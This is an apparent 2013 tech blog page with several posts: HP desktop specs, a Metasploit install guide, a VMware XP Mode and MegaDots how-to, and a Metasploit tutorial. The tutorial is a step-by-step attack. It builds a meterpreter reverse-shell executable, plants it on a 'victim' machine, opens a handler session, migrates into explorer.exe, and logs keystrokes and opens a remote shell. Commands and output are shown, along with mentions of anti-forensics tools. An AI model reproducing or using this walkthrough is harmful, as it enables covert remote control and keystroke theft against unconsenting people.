Pages

Banner 468

Thursday 31 October 2013

HP PAVILION DESKTOP 500-100IX (500 series) drivers download win7-8

3 comments
 

    HP PAVILION DESKTOP 500 SERIES


Motherboard



Memphis-S


Processor



Intel Core i5 4440


Processor upgrade information


Memory



4 GB


Memory upgrade information


Video graphics



Integrated Intel HD Graphics 4600 (GT2)


Sound/Audio



Integrated IDT 92HD65C Audio


Networking



Integrated Bluetooth 4.0 and Wireless LAN 802.11b/g/n featuring Single-band (2.4Ghz) 1X1 technology


LAN: 1000-Base-T


Hard drive



500 GB

Readmore...
Monday 28 October 2013

How to Hack Like a Pro: Getting Started with Metasploit

0 comments
 
This is my first contribution in an ongoing series on detailing the best free, open source hacking and penetration tools available. My goal is to show you some of the quality tools that IT security experts are using every day in their jobs as network security and pen-testing professionals. There are hundreds of tools out there, but I will focus and those that meet four key criteria:
  1. Open source
  2. Free
  3. High quality
  4. Widely used and trusted in the IT security/pen-testing community
As such, no hacker/penetration tool box is complete without the addition of the versatile and powerful Metasploit.

What Is Metasploit?

Metasploit is among the most widely used exploitation tools in the hacking/security field. It's used by both novices and advanced professionals. Insecure.Org, run by Fyodor, the founder of Nmap, annually surveys security professionals for their opinion on the top security software. Metasploit has consistently ranked among the top ten since its inception and currently ranks second. That should give you some idea of how important Metasploit is in the security community.
Metasploit is a self-described "framework" for cyber exploitation. As a framework, it eases the effort to exploit known vulnerabilities in networks, operating systems and applications, and to develop new exploits for new or unknown vulnerabilities. As of last Thursday, Project Basecamp announced the development of a Stuxnet-like module for Metasploit.
Metasploit has developed a Meterpreter that when loaded into a target system, makes maintaining access and controlling the target much easier. As such, every self-respecting hacker (and even those without self-respect) should have some basic knowledge of Metasploit. This series of articles will initially focus on conferring at least a rudimentary understanding of how Metasploit works and how it can be utilized by the hacker/penetration tester to own the box, download data and cover your tracks.

A Little Background

Metasploit was developed in 2003 as an open source project by H.D. Moore. Originally developed in PERL, the developer team rewrote Metasploit in Ruby in 2007. This is critical, because you need to have Ruby on your system in order to run Metasploit and to develop your own exploits.
After many years of success in the hacker/penetration tester community, it was purchased by Rapid7 in 2009. After its purchase, the Metaspoloit framework was split into three versions. Two are commercial versions; Metasploit Express and Metasploit Professional, the latter selling for $1800. These two have nice GUIs and numerous bells and whistles, including the automation of several attacks, but there is still a free and open source community edition known as the Metasploit Community.
Fortunately, some independent developers at Armitage have created a free and open source GUI for Metasploit that is both beautiful and elegant, for those that prefer the point-and-click mode of operation.
There is a Windows version of Metasploit, but many of the features (raw IP packet injection, wireless driver exploitation, SMB relaying attacks, etc.) are unavailable in the Windows environment, though some of these limitations can be overcome by using Cygwin or running Windows in a virtual environment on Linux.
For these and other reasons, we will commence this series using the more flexible command line interface (CLI) version in Linux, and eventually we will install and use the Armitage GUI.

Download and Installation

The first step in our process is to download and install Metasploit. Although there is a Windows version, I will focus on the Linux version because of its greater flexibility and capability. Let's walk through the download and installation on my favorite Linux distro, Ubuntu.
To install the latest version of the Metasploit 4 Framework (MSF4) on Ubuntu 10.04 (or any other Debian-based distros), use the following commands. This downloads and installs the generic Linux binary which comes bundled with all the necessary components you need for Metasploit to install and run. This should work for most users and is the easiest and quickest way to get the Metasploit Framework running under Ubuntu and other Debian-based Linux distros.
First open a terminal window and type:
wget http://updates.metasploit.com/data/releases/framework-4.0.0-linux-full.run
If you’re installing on a 64-bit build of Ubuntu, use this instead:
wget http://updates.metasploit.com/data/releases/framework-4.0.0-linux-x64-full.run
This downloads the current version of the Metasploit framework via Wget.
Before you can run the installer, you need to make it executable. In the terminal, you must change the mode to execute (x) for Metasploit:
chmod +x framework-4.*-linux-full.run
And now execute the installer by getting root privileges by typing sudo and ./ with the name of our package:
sudo ./framework-4.*-linux-full.run
You should then be prompted for your root password. After entering that, you should get a screen that looks something like this:
Go ahead and click Forward.
Agree to the terms of the license agreement and click Forward.
I suggest that you select Yes for automatic updates so that your exploit framework has the latest and greatest updates. Click Forward.
Here, Metasploit is asking whether you want to insert a different service script. You can just accept the default and hit Forward.
Be patient now; it will take Metasploit a few minutes to install and build your database. After it's done, you are ready to run Metasploit. Simply type:
msfconsole
Finally, you should be greeted by this screen.
You have now successfully installed the world’s best open source exploit framework and you are ready to begin system/network exploitation and pen testing!
Please note that in my installation here, it warns me that updating is recommended as the last update was 249 days ago. If you want to update your framework, then type:
sudo msfupdate
In my next article, we will look at the terminology and components of Metaspolit and then initiate a tried and true exploit.

See Also

Readmore...

The Metasploit Framework

0 comments
 
--- The Metasploit Framework ---


Note: This is an advance topic.Read Carefully. Feel free to ask any kind of queries . We are always here to help you.

If you are really interested in network security, chances are you must have heard of the Metasploit over the last few years.
Now, have you ever wondered what someone can do to your PC, by just knowing your IP. Here's the answer. He could 0wN you, or in other words , he could have full access to your PC provided you have just a few security loopholes which may arise cause of even a simple reason like not updating your Flash player last week, when it prompted you to do so.
Metasploit is a hacker's best friend, mainly cause it makes the job of exploitation and post-exploitation a lot easier compared to other traditional methods of hacking.
The topic Metasploit is very vast in itself.However, i'll try keeping it basic and simple so that it could be understood by everyone here. Also, Metasploit can be used with several other tools such as NMap or Nessus (all these tools are present in Backtrack ).
In this tutorial, i'll be teaching you how to exploit a system using a meterpreter payload and start a keylogger on the victim's machine.

Hacking through Metasploit is done in 3 simple steps: Point, Click, 0wn.

Before I go into the details of The Metasploit Framework, let me give you a little idea of some basic terms (may seem boring at first, but you must be knowing them)

Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited resulting in notable damage.
Exploit: A piece of software that take advantage of a bug or vulnerability, leading to privilege escalation or DoS attacks on the target.
Overflow: Error caused when a program tries to store data beyond its size. Maybe used by an attacker to execute malicious codes.
Payload: Actual code which runs on the compromised system after exploitation
Now, what Metasploit IS?
It is an open source penetration testing framework, used for developing and executing attacks against target systems. It has a huge database of exploits, also it can be used to write our own 0-day exploits.



METASPLOIT ANTI FORENSICS:
Metasploit has a great collection of tools for anti forensics, making the forensic analysis of the compromised computer little difficult. They are released as a part ofMAFIA(Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer, Transmogrify.
Metasploit comes in the following versions:
1. CLI (Command Line Interface)
2. Web Interface
3. MSF Console
4. MSFwx
5. MSFAPI
I would recommend using the MSF Console because of its effectiveness & powerful from a pentester’s P0V. Another advantage of this mode is, several sessions of msfconsole could be run simultaneously.
I would recommend you doing the following things in Metasploit, on a Backtrack(system or image), avoiding the windows version of the tool.
For those of all who don't know, Backtrack is a linux distro especially for security personals, including all the tools required by a pentester.
Download Backtrack from here. You can download the ISO or VMware image, according to the one you're comfortable with. If you have 2 access to more than 1 system physically, then go for the ISO image and install it on your hard disk.
Let the Hacking Begin :
Open up backtrack. You should have a screen similar to this.
The default login credentials are:
Username: root
Pass: toor
Type in
root@bt:~#/etc/init.d/wicd start
to start the wicd manager
Finally, type "startx" to start the GUI mode:
root@bt:~#startx

First of all, know your Local Ip. Opening up a konsole (on the bottom left of taskbar) and typing in:
root@bt:~#ifconfig
It would be something like 192.168.x.x or 10.x.x.x.
Have a note of it.
Now,
Launch msfconsole by going to Applications>>Backtrack>>Metasploit Engineering Framework>>Framework Version 3>>msfconsole

You should now be having a shell something similar to a command prompt in windows.
msf >
Let’s now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.
Open another shell window (”Session>>New Shell” or click on the small icon on the left of the shell tab in the bottom left corner of the window)

root@bt:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=”your local ip” LPORT=”any port you wish” x > /root/reverse_tcp.exe
Your local IP is the one you noted earlier and for port you could select 4444.
(Everything has to be entered without quotes)
You should get something like this:
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=192.168.255.130,LPORT=4444
root@bt:/opt/metasploit3/msf3#
Also, now on your backtrack desktop, you would be seeing a reverse_tcp.exe file.
Migrate it to your other computer in the same local network using a thumb drive or by uploading it online.
Now open the 1st shell window with msfconsole in it.
msf >
Type the following:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.255.130
LHOST => 192.168.255.130
msf exploit(handler) > set LPORT 4444
LPORT => 4444
All the connections are done. You have already made an executable file which makes a reverse connection to you.
And now, you have set the meterpreter to listen to you on port 4444.
The last step you have to do now, is to type in “exploit” and press enter,
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.255.130:4444
[*] Starting the payload handler...
Now, the payload is listening for all the incoming connections on port 444.
[*] Sending stage (749056 bytes) to 192.168.255.1
[*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011
You would see a meterpreter prompt like this
meterpreter >
Type in ps to list the active processes
meterpreter > ps
Search for explorer.exe and migrate to the process
meterpreter > migrate 5716
[*] Migrating to 5716...
[*] Migration completed successfully.
meterpreter >
Type in the following:
meterpreter > use priv
Now, if you want to start the Keylogger activity on victim, just type keyscan_start
Now, if you want to go to the victim’s computer,
Jus type shell
meterpreter > shell
Process 5428 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
You would now be having a command prompt,
Type in whoami, to see the computer’s name of victim :
C:\Windows\system32>whoami
whoami
win7-pc\win 7
C:\Windows\system32>
Let’s suppose you want to start a notepad on the victim’s computer.
Type in:
Let’s say the victim has typed in anything on his computer.
Just type exit, to return to meterpreter.
Now type in keyscan_dump, to see all the typed keystrokes :
meterpreter > keyscan_dump
Dumping captured keystrokes...
GaM3 0V3R
P.S.: The above information is just for educational purposes only. You should test it against the computer you own.


Readmore...

Run XP Mode on Windows 7 Machines Using VMware

0 comments
 

How does this work?

Even if your computer doesn’t have hardware virtualization, you can still install XP Mode but just cannot run it as you can’t run Virtual PC.  Enter VMware Player.  This free program lets you create and run virtual machines, whether or not you have hardware virtualization.  And, it can directly import XP Mode so you can use that copy of XP for free.  A couple features are different, but it’s still a great replacement since you otherwise couldn’t use it at all.
Note: XP Mode does not work on Home Versions of Windows 7 and you’ll need VMware Player 3.0

Getting Started

First, download and install XP Mode (link below).  There is no need to download Virtual PC if your computer cannot run it, so just download the XP Mode from the link on the left.



Install XP mode; just follow the default prompts as usual.



Now, download and install VMware player.  The download is free, but requires registration.



You may see some prompts about installing drivers; simply approve them.  We didn’t see them on our latest test, but have in the past.  When you are finished installing VMware Player, you will have to restart your computer.



Add XP Mode to VMware Player

Now that your computer is rebooted, run VMware Player.  We can import XP Mode by clicking File, then click "Import Windows XP Mode VM."



VMware Player will simply start importing your XP Mode.  Converting XP mode to VMware format may take a couple minutes depending on your hardware, so just be patient.



When this is done, you should see a new virtual machine in VMware Player called XP Mode!  Click "Play Virtual Machine" to run XP Mode.



XP will run through it’s first-run setup process.



While it is loading, you may be prompted to install or update VMware Tools.  This is required to integrate XP Mode into your computer, so click Update Tools or Install Tools depending on you situation.



The tools will automatically download and install, though you may have to approve an UAC prompt.


 
Now you can proceed with your XP setup.  Accept the license agreement,



Choose your locale and keyboard settings



Enter a name for the virtual machine and an administrative password



And enter the correct date, time, and timezone.  It usually gets the correct time and date from your computer itself, but the time zone is often incorrect.



XP will now finalize your changes, and then reboot.



When XP Mode restarts, choose your settings for updates.



Windows may ask to search for drivers.  Simply press cancel, as VMware Tools will contain everything we need.



After a short delay, you should see your XP desktop in VMware Player!



There’s one last thing that needs to be installed – VMware Tools.  This should automatically open in XP Mode; if not, click Start, then My Computer, and finally double-click on the CD drive which should say VMware Tools.



Now, simply run the Tools installer with the Typical setup type, and reboot the XP Mode when it’s finished.



Now VMWare is setup and we’re ready to start integrating it with Windows 7.



Integrate XP Mode in VMware Player with Windows 7

The real advantage of the default XP Mode in Windows 7 is that the XP programs are fully integrated with their Windows 7 counterparts.  You can run them seamlessly with other programs, copy between them, and even open and save files to the same folders.
Let’s set this up in VMware.  Copy and paste from Windows 7 to XP Mode in VMware is activated by default.  To use your XP programs seamlessly with Windows 7, click VM on the top of the VMware window, and click "Enter Unity."



You can easily access any program or file in XP mode through a dedicated XP Mode Start Menu.  When you hover over your Windows 7 Start button, a new button called "Windows XP Mode" will above it.  Click there to access a full start menu from XP Mode right in Windows 7.



Here is an IE 6 window from XP running side-by-side with IE 8 in Windows 7, thanks to VMware Player!



By default, the virtualized windows will have a border and the VMware logo on their edge.



To remove this logo, click VM in the VMware player window, then settings.  Click on the Options tab, and choose Unity on the left.  Now uncheck the boxes that say "Show borders" and "Show badges."



Without having the VMWare borders and badges give everything a more authentic XP Mode look and feel.



You can even use removable devices, such as flash drives, in XP Mode in VMware Player.  Whenever you connect a new device to your computer, VMware will remind you that you can add it to XP Mode.



Simply click VM, then Removable Devices.  Select your device name, and click Connect.



Save Files in XP Mode to My Documents in Windows 7

logo for MegaDots
You may want to share the entire "C" drive of the Windows 7 with the virtual XP computer.

By default, files created in XP Mode in VMware Player will be saved inside the virtual machine.  It’s more convenient if they’re saved directly to the My Documents folder in Windows 7, so let’s change this.  Click VM, then Settings.  Click the Options tab, and then choose Shared Folders on the left.  Now click the bullet for "Always enabled" and check the box for "Map as a network drive in Windows guests."



Now click Add at the bottom of that window.  This will let us add a shared folder.



Let’s add the My Documents folder from Windows 7.  Click Browse, and then select your My Documents folder.  Click Ok, and then click Next.



Make sure the box is checked that says "Enable this share" and then click Finish.  You can now close the settings window as well.



Back in XP Mode, click Start, then right click on My Documents, and select Properties.



Click Move to find the new My Documents folder.



Find the folder we just shared from Windows 7 by clicking My Computer, then the drive that says "Shared Folders on ‘vmware-host’" or something similar.  Now select the folder we shared, Documents, and click Ok.



Click Ok in the main properties window.  It may offer to copy the files from your old My Documents folder to the new one; choose Yes to make sure you have all of your documents in Windows 7.



Now, whenever you go to save a file in XP Mode, it will automatically save in your My Documents folder on Windows 7.  You can repeat the same process for any folder you wish, such as your My Pictures and My Music folders.

Conclusion

That’s all … now you have your full XP Mode running on your computer without hardware virtualization.  Almost all the same features are there; the only thing you’re missing is the Start Menu integration, but VMware’s menu is the next best thing. In our tests using VMware worked as good or better as actual XP Mode on a machine that supports hardware virtualization. If you’re frustrated that the Windows 7 machine(s) you have don’t support XP Mode, using our VMware method works, and allows you to use it on whatever machine you want.

logo for MegaDots

Using Virtual Windows XP with MegaDots

Virtual Windows XP will allows you to run applications within the Virtual PC window. Install MegaDots in the Windows XP window. Answer no to the question about full screen. Close the Windows XP window before launching MegaDots.
  • Install the Virtual System (32 bit Windows)
  • Install MegaDots in the Virtual System
  • If needed, reduce the screen resolution on the Host system until the Virtual system can fill the screen.
  • Set the Virtual System to Full Screen
  • Maximize the MegaDots font size as much as you can without losing any part of the MegaDots screen
  • If needed, lower the screen resolution for the Virtual System so that the MegaDots screen is even larger.
If you are using Windows XP, change the font name and size on the print side. To do that, launch MegaDots and press Alt-spacebar. Then press P and select the font tab. Choose MegaDots window braille as your font.
The idea in enlarging the font is to make the window as big as possible without losing any part of the MegaDots screen. Be aware that the window can never take up the whole screen. For most laptops, we recommend 24 point for a sighted user, 20 point for a user of JAWS or Window-Eyes. If you are asked, save these parameters for future use of this program.
Be aware that the MegaDots window braille font is designed to work with screen font smoothing turned on. If the font appears to have box-like braille dots without any shadow dots, you have screen font smoothing turned off. On your desktop, right click, choose, Properties, Appearance, click on Effects and make sure the screen font smoothing choice is checked.
To make the display work as well as possible in MegaDots, go to the MegaDots Preferences Menu, Editor. Set Text size to N (Normal), as leaving it at C (Compact) causes problems. In the same form, also make sure that Big cursor is set to No. Do not forget to save your Preferences.
In the installation example, the host Windows 7 C drive looks to the XP machine like the Z drive. Open the Z drive from within MegaDots to read files from the host machine.
On the Windows 7 Desktop, from the Start Menu, you can locate All Programs, Windows Virtual PC, Windows XP Mode Applications, Duxbury, MegaDots 2.5 without Speech. Right Click on this, and then select Send to and then Desktop (create shortcut). This way you can launch MegaDots directly from the Windows 7 Desktop. Using the y drive (see above), you can read and write from the full Windows 7 hard drive. While there are some limitations, this is getting close to a full use of MegaDots on a 64 bit system.
Some users find that using MegaDots in a window is distracting if there is too much going on outside the MegaDots window. Here is an excellent red background for use with MegaDots in a window right click on the image and select "Set as Background".
In order to import Word files, you do not need to have a copy of Microsoft Word installed in the XP emulation. In order to export to Word files, you do need to install a copy of Microsoft Word in the XP emulation. Why? Because the DBT engine within MegaDots has all the software it needs to read Word files. But when MegaDots exports to Word, it is really exporting to html, and then using your existing copy of Word with Word automation to turn that into a genuine Word file. One approach is to export to html from the XP emulation, and save the html files in the Windows 7 computer. From the Windows 7 computer, you can import the html files and Save As Word files. This is time consuming, but avoids needing to obtain another copy of Word.
In order to do the work you want to do in the XP emulation, you many need to install other software programs, such as Adobe Reader or any other that helps you get your work done. Or you may need to install several printers for use within the emulation. Remember that from the XP emulation, you can read any part of the Windows 7 computer, but the Windows 7 computer cannot read anything in the XP emul
Readmore...